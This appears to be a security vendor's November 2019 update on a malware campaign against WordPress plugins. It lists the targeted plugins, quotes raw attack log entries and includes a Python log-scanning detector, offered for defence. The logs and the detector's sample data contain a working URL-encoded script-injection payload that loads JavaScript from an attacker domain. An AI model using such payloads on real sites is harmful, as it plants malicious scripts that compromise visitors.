This is an update on the long-running malware campaign that has been targeting vulnerable plugins since January. Please check our previous updates below:
- Multi-Vector Attack in Server Logs: March 2019
- Plugins Added to Malicious Campaign – April 2019
- Malware Campaign Evolves to Target New Plugins: May 2019
- Plugins Under Attack: June 2019
- Plugins Under Attack: July 2019
- Plugins Under Attack: August 2019
- Plugins Under Attack: September 2019
- Plugins Under Attack: October 2019
Plugins Under Attack: November 2019
Although attackers focused on infecting sites via the attack vectors described here, we were able to detect the same behavior targeting plugins at the very end of this month.
Plugins that continue to be leveraged by attackers are:
- Rich Reviews
- Kiwi-Social-Share
- Blog Designer
- WP Live Chat Support
- Yellow Pencil Visual Theme Customizer
- Social Warfare
- Yuzo Related Post
- WP-Piwik
Plugin Payloads Added to the Campaign
Folders
46.101.174.128 - type=attachment&width=%3C%2Fstyle%3E%3Cscript+type%3Dtext%2Fjavascript+src%3D%27https%3A%2F%2Ftop.worldctraffic.com%2Ftop%27%3E%3C%2Fscript%3E%3Cstyle%3E [23/Nov/2019:12:19:33 +0000] "POST /wp-admin/admin-ajax.php?action=wcp_change_post_width HTTP/1.1"
Simple Fields
46.101.174.128 - action=simple_fields_do_import&import-json=%7B%0A++++%22field_groups%22%3A+%7B%0A++++++++%221%22%3A+%7B%0A++++++++++++%22id%22%3A+1%2C%0A++++++++++++%22key%22%3A+%22test%22%2C%0A++++++++++++%22slug%22%3A+%22test%22%2C%0A++++++++++++%22name%22%3A+%22test%22%2C%0A++++++++++++%22description%22%3A+%22%22%2C%0A++++++++++++%22repeatable%22%3A+false%2C%0A++++++++++++%22fields%22%3A+%5B%5D%2C%0A++++++++++++%22fields_by_slug%22%3A+%5B%5D%2C%0A++++++++++++%22deleted%22%3A+false%2C%0A++++++++++++%22gui_view%...skipped...%22deleted%22%3A+false%2C%0A++++++++++++%22hide_editor%22%3A+false%2C%0A++++++++++++%22added_with_code%22%3A+false%2C%0A++++++++++++%22field_groups_count%22%3A+1%0A++++++++%7D%0A++++%7D%2C%0A++++%22post_type_defaults%22%3A+%5B%0A++++++++false%0A++++%5D%0A%7D&import-what=textarea&simple-fields-import-type=replace [23/Nov/2019:13:02:05 +0000] "POST /wp-admin/admin-post.php HTTP/1.1"
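To spot requests like these in your own access logs, here is an added detection example (not part of the original post and not Sucuri's tooling) that decodes the POST body of entries laid out like the ones above and flags parameters carrying injected script or style tags, along with the plugin actions abused in this campaign. The log lines inside it are constructed; the second one is a benign request to the same action, included for contrast.

```python
import re
import urllib.parse

# Constructed sample log lines laid out like the entries above: client IP,
# raw POST body, timestamp, request line. The second line is a benign
# constructed request to the same action, included for contrast.
SAMPLE_LOG = """\
46.101.174.128 - type=attachment&width=%3C%2Fstyle%3E%3Cscript+type%3Dtext%2Fjavascript+src%3D%27https%3A%2F%2Ftop.worldctraffic.com%2Ftop%27%3E%3C%2Fscript%3E%3Cstyle%3E [23/Nov/2019:12:19:33 +0000] "POST /wp-admin/admin-ajax.php?action=wcp_change_post_width HTTP/1.1"
203.0.113.5 - type=attachment&width=640 [23/Nov/2019:12:20:01 +0000] "POST /wp-admin/admin-ajax.php?action=wcp_change_post_width HTTP/1.1"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) - (?P<body>.*?) \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)"$')
# Plugin actions seen in the entries above (Folders and Simple Fields).
WATCHED_ACTIONS = {"wcp_change_post_width", "simple_fields_do_import"}
TAG_RE = re.compile(r"<\s*/?\s*(?:script|style)\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://([\w.-]+)", re.IGNORECASE)


def analyze_line(line):
    """Decode one log line and return findings, or None if nothing stands out."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    body = urllib.parse.parse_qs(m["body"], keep_blank_values=True)
    parts = m["req"].split(" ")
    target = urllib.parse.urlsplit(parts[1] if len(parts) > 1 else "")
    query = urllib.parse.parse_qs(target.query)
    # The action can travel in the query string (admin-ajax.php) or in the body.
    actions = set(query.get("action", [])) | set(body.get("action", []))
    values = [v for vals in body.values() for v in vals]
    tagged = [k for k, vals in body.items() if any(TAG_RE.search(v) for v in vals)]
    hosts = sorted({h.lower() for v in values for h in URL_RE.findall(v)})
    if not tagged and not (actions & WATCHED_ACTIONS):
        return None
    return {
        "ip": m["ip"],
        "path": target.path,
        "actions": sorted(actions),
        "watched_action": bool(actions & WATCHED_ACTIONS),
        "injected_params": tagged,  # parameters whose decoded value carries a tag
        "hosts": hosts,             # external hosts referenced by the payload
    }


def scan(log_text):
    """Return findings only for lines that actually carry an injected tag."""
    findings = []
    for line in log_text.splitlines():
        f = analyze_line(line)
        if f and f["injected_params"]:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```

Requests that hit a watched action without a tag in the body are returned by `analyze_line` but not by `scan`, so you can review them separately rather than alerting on every legitimate use of the plugin.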
Malicious Domains and IPs:
IPs:
Domains Injected:
- https[:]//top[.]worldctraffic[.]com/cas?/java.js?t=2&
We strongly encourage you to keep your software up to date to prevent infection. You can add a WAF as a second layer of protection to virtually patch these vulnerabilities.